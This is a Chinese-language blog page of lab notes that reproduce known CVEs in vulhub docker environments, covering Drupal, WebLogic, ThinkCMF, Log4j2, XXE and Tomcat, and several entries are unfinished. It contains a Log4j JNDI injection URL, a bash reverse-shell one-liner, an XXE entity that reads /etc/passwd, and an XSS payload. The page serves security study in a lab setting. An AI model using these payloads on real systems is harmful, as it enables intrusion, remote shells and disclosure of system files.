以下是一些已知的漏洞及其相关信息,供研究和复现使用

CVE-2019-6341✔

在 kali 上使用 vulhub 环境,先进入目录vulhub/drupal/CVE-2019-6341

1
2
3
# 启动 docker,启用环境
sudo service docker start
docker-compose up -d

image-20230201103958438

在浏览器访问:http://127.0.0.1:8080

image-20230201104330268

1
2
3
4
5
# 上传 POC
php blog-poc.php 127.0.0.1 8080

# 访问,FireFox 过滤了 XSS,所以不弹窗
http://127.0.0.1:8080/sites/default/files/pictures/2023-02/_0

image-20230201114255063

image-20230201115755538

漏洞利用 drupal 文件上传模块,文件内容是 HTML 代码,但 JS 代码包含其中
<SCRIPT>alert(123);</SCRIPT>

CVE 2014-4210✔

vulhub/weblogic/ssrf at master · vulhub/vulhub (github.com)

在 kali 上使用 vulhub 环境,先进入目录vulhub/weblogic/ssrf

1
2
3
# 启动 docker,启用环境
sudo service docker start
docker-compose up -d

image-20230212161021377

Weblogic 中存在一个 SSRF 漏洞,利用该漏洞可以发送任意 HTTP 请求,进而攻击内网中 redis、fastcgi 等脆弱组件。

访问http://127.0.0.1:7001/uddiexplorer/,查看 uddiexplorer 应用。

点击 Search Public Registries 进行抓包

vmware_YgFeTbcOEz

image-20230212170753796

image-20230212170940338

未完……

thinkcmf-x1.6.0-x2.2.3✔

ThinkCMF 是一个基于 ThinkPHP 框架开发的内容管理框架。可利用此漏洞构造恶意的url,向服务器写入任意内容的文件,达到远程代码执行的目的

下载ThinkCMF2.2.2版本,X2.2.2 ·ThinkCMF/CMFX (github.com),解压后放到 phpstudy 环境的 web 根目录下

然后,输入数据库密码 root,设置用户名、密码、邮箱等完成安装设置

230220PM03_54

230220PM03_55

log4j2-cve-2021-44228✔

环境搭建

使用 vulhub,切换到漏洞目录

1
cd /root/vulhub/log4j/CVE-2021-44228

230220PM10_58

230220PM10_59

230220PM10_60

漏洞复现

先利用 dnslog 查看回显,然后测试网站

1
http://127.0.0.1:8983/solr/admin/cores?action=${jndi:ldap://f4ae3u.dnslog.cn}

工具使用https://github.com/bkfish/Apache-Log4j-Learning/

1
git clone https://github.com/bkfish/Apache-Log4j-Learning.git

构造 payload 使用 base 64加密

1
bash -i >& /dev/tcp/192.168.31.137/8983 0>&1

……

XXE 漏洞 | rrodrigo/xxelab✔

环境搭建

1
2
3
4
# 下载镜像
docker pull rrodrigo/xxelab

docker run -d -p 8082:80 rrodrigo/xxelab

将主机的 8082 端口映射到容器的 80 端口上,在浏览器中访问映射出来的端口,http://localhost:8082

230222PM07_28

漏洞复现

通过用 burp 抓包发现是 xml 格式

1
2
3
4
5
<!DOCTYPE c [
<!ENTITY file SYSTEM "/etc/passwd">
]>

# 定义了一个名为 file 的实体,它的值是 /etc/passwd,这是一个包含系统用户信息的文件。

Tips / 提示

在 XML 中,实体是可以被引用的对象,类似于变量。当 XML 解析器解析包含该实体的 XML 文档时,它会将实体引用替换为实体的实际值。攻击者可以构造恶意的 XML 数据,将实体引用插入到数据中,从而让 XML 解析器读取和输出 /etc/passwd 文件的内容。

230222PM08_29

CVE-2017-12615(tomcat-pass-getshell)

环境搭建

使用 vuluhub 的 docker 进行漏洞复现

230224PM08_54

230224PM08_52

230224PM08_53

漏洞复现

……

CVE-2020-14882

允许未授权的用户绕过管理控制台的权限验证访问后台

先找到目录:vulhub/weblogic/CVE-2020-14882

1
2
cd vulhub/weblogic/CVE-2020-14882 
docker-compose up –d

2.进入 vulhub/weblogic/CVE-2020-14882 目录下,使用命令docker-compose up –d启动环境

3.浏览器访问:你的 ip:7001/console/login/LoginForm.jsp 成功访问表示环境搭建成功

log4j2-rce-2021-12-09

环境搭建

1
2
3
4
5
# 使用docker
docker pull vulfocus/log4j2-rce-2021-12-09

# 启动docker容器
docker run -tid -p 38080:8080 vulfocus/log4j2-rce-2021-12-09

漏洞复现

……未完待续

wordpress_cve_2019_15866

showdoc-cnvd_2020_26585

CVE-2019-9670(远程代码执行漏洞复现)

CVE-2020-5412

phpmyadmin-cve_2014_8959


© Rabbit 使用 Stellar 创建

✨ 营业:

共发表 56 篇Blog 🔸 总计 123.6k